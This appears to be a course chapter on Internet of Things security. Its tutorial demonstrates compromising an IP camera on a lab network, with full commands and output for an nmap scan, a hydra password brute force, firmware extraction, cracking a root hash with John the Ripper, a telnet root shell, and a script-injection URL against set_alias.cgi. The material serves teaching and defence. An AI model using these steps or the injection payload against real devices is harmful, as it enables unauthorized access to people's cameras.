Internet of Things SecurityObjectivesWe have built an infastructure on the Internet around servers and desktops with highly secure operating systems, such as with Windows 7/8 and Mac OS X. These systems are ofte nwell tested and run a range of security software, with regular updates based on security threats. The greatest threat for the Internet security are device which are fairly static in their operatio, and have limited capacity for updates, and can often contain things like default passwords and have ports open that intruders could connect to. The key findings we will find are:
The key objectives of this chapter are:
LectureThe following provides some background on different types of architectures used to connect devices to the Internet, and then demonstrates how an IP camera can be compromised: TestsSlidesThe slides for the chapter are [here] TutorialThis article outlines how we can assess the security of a Linux-based embedded system. First we determine the TCP ports open on the device: root@kali:~/system/system/bin# nmap 192.168.0.2 Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-04 12:52 GMT Nmap scan report for Unknown (192.168.0.2) Host is up (0.0062s latency). Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet 80/tcp open http 8600/tcp open asterix MAC Address: 78:A5:DD:08:FC:DC (Shenzhen Smarteye Digital Electronics Co.) Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds Next, we find that the Web server does not have a lock-out on usernames and passwords: billbuchanan@Bills-MacBook-Pro:~/webcam$ hydra -V -W 1 -t 1 -L user.txt -P pass.txt 192.168.0.2 http Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-04 12:59:18 [WARNING] The service http has been replaced with http-head and http-get, using by default GET method. Same for https. [WARNING] You must supply the web page as an additional option or via -m, default path set to / [DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task [DATA] attacking service http-get on port 80 [ATTEMPT] target 192.168.0.2 - login "root" - pass "password" - 1 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "root" - pass "default" - 2 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "root" - pass "none" - 3 of 30 [child 0] ... [ATTEMPT] target 192.168.0.2 - login "admin" - pass "123" - 16 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "admin" - pass "12345" - 17 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "admin" - pass "123456" - 18 of 30 [child 0] [80][www] host: 192.168.0.2 login: admin password: 123456 [ATTEMPT] target 192.168.0.2 - login "user" - pass "password" - 19 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "user" - pass "default" - 20 of 30 [child 0] [ATTEMPT] target 192.168.0.2 - login "user" - pass "none" - 21 of 30 [child 0] The Telnet service on the IP camera locks out after three attempts, but we can examine the firmware from the camera: root@kali:~# binwalk 51.3.0.152.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------------------------------------- 36 0x24 Zip archive data, at least v1.0 to extract, name: "system/" 101 0x65 Zip archive data, at least v1.0 to extract, name: "system/Wireless/" 175 0xAF Zip archive data, at least v1.0 to extract, name: "system/system/" 247 0xF7 Zip archive data, at least v1.0 to extract, name: "system/system/drivers/" 327 0x147 Zip archive data, at least v1.0 to extract, name: "system/system/bin/" 403 0x193 Zip archive data, at least v2.0 to extract, compressed size: 25717, uncompressed size: 108204, name: "system/system/bin/daemon.v5.5" 26207 0x665F Zip archive data, at least v2.0 to extract, compressed size: 167785, uncompressed size: 685920, name: "system/system/bin/mailx" 194073 0x2F619 Zip archive data, at least v2.0 to extract, compressed size: 238464, uncompressed size: 780068, name: "system/system/bin/encoder" 432620 0x699EC Zip archive data, at least v2.0 to extract, compressed size: 3106, uncompressed size: 8372, name: "system/system/bin/gmail_thread" 435814 0x6A666 Zip archive data, at least v2.0 to extract, compressed size: 3075, uncompressed size: 8260, name: "system/system/bin/cmd_thread" 438975 0x6B2BF Zip archive data, at least v2.0 to extract, compressed size: 13149, uncompressed size: 45876, name: "system/system/bin/ssmtp" 452205 0x6E66D Zip archive data, at least v2.0 to extract, compressed size: 24681, uncompressed size: 104800, name: "system/system/bin/daemon.v5.3" 476973 0x7472D Zip archive data, at least v2.0 to extract, compressed size: 84641, uncompressed size: 170920, name: "system/system/bin/unzip1" 561696 0x89220 Zip archive data, at least v2.0 to extract, compressed size: 15429, uncompressed size: 43616, name: "system/system/bin/upnpc-static" 577213 0x8CEBD Zip archive data, at least v2.0 to extract, compressed size: 35607, uncompressed size: 95132, name: "system/system/bin/ftp" 612899 0x95A23 Zip archive data, at least v1.0 to extract, name: "system/system/lib/" 612975 0x95A6F Zip archive data, at least v1.0 to extract, name: "system/www/" 613044 0x95AB4 Zip archive data, at least v1.0 to extract, name: "system/init/" 613114 0x95AFA Zip archive data, at least v2.0 to extract, compressed size: 99, uncompressed size: 203, name: "system/init/ipcam.sh" 615021 0x9626D End of Zip archive We can now extract the firmware to a ZIP file (image.zip) and then extrat it using: dd bs=1 skip=36 if=51.3.0.152.bin of=image.zip unzip image.zip Next we can then examine the daemon file for its contents, and can see that it contains the details of the /etc/passwd file: root@kali:~# cat daemon.v5.5 ps > /tmp/gps.txt/tmp/gps.txtrfopen failed encoderreboot/system/system/bin/encoder &/etc/passwdwbroot:LSiuY7pOmZG2s:0:0:Adminstrator:/:/bin/sh/etc/grouproot:x:0:adminsystem:%2x-%2x-%2x this isn't system file We can then use John The Ripper to determine the password for the Administrator: john pass.txt root:123456:0:0:Adminstrator 1 password hash cracked, 0 left After this we can log into the device using Telnet: billbuchanan@Bills-MacBook-Pro:~/webcam$ telnet 192.168.0.2 Trying 192.168.0.2... Connected to 192.168.0.2. Escape character is '^]'. (none) login: root Password: 123456 BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # ls var tmp sys proc mnt lib home etc bin usr system sbin param media init etc_ro dev # cd system # ls system daemon Wireless init www # cd www # ls mime.types config.htm ftp.htm status.htm Deutsch jpeg.html user.htm index1.htm snapshot.htm traditional_chinese test_mail.htm alias.htm ... ip.htm system-b.ini appversion.txt french recordplay.htm sensordata.bin upnp.htm params_backup.cgi ptz.htm ap.htm multidev.htm recordsch.htm We can then examine the system: # cat /proc/version Linux version 2.6.21 (root@mailzxh-desktop) (gcc version 3.4.2) #636 Fri Nov 16 10:03:21 CST 2012 # cat /proc/cpuinfo system type : Ralink SoC processor : 0 cpu model : MIPS 24K V4.12 BogoMIPS : 239.10 wait instruction : yes microsecond timers : yes tlb_entries : 32 extra interrupt vector : yes hardware watchpoint : yes ASEs implemented : mips16 dsp VCED exceptions : not available VCEI exceptions : not available # cd /system # cd init/ # ls ipcam.sh # cat ipcam.sh export LD_LIBRARY_PATH=/system/system/lib:$LD_LIBRARY_PATH export PATH=/system/system/bin:$PATH telnetd /system/system/bin/daemon.v5.5 & /system/system/bin/cmd_thread & /system/system/bin/gmail_thread & Finally there is a XSS vulnerability on the device which allows the CGI script to inject code: http://192.168.0.2:80/set_alias.cgi?alias=%22;alert("hello");var%20a=%22&next_url=alias.htm&loginuse=admin&loginpas=abc This will cause the message "Hello" to be displayed for every page accessed. ConclusionsApplication developers and integrators need to have a strong understanding of security in the systems that they create. This article has show how easy it can be to compromise a device with limited capacity, and that the number of these devices will increase. It should be reminded that there is often little scope for updates on embedded systems, so if users do not update their firmware they can be open to abuse from intruders. The target for intruders in the future could thus move from servers and desktops to a range of Internet-enabled devices. The same security testing for these devices needs to be applied as it is currently for traditional computer systems. The main weakness on this camera is that there is no lock-out for a continual prompting for passwords. Thus, if a weak password is used, it is often fairly easy for an intruder to gain access to the device. |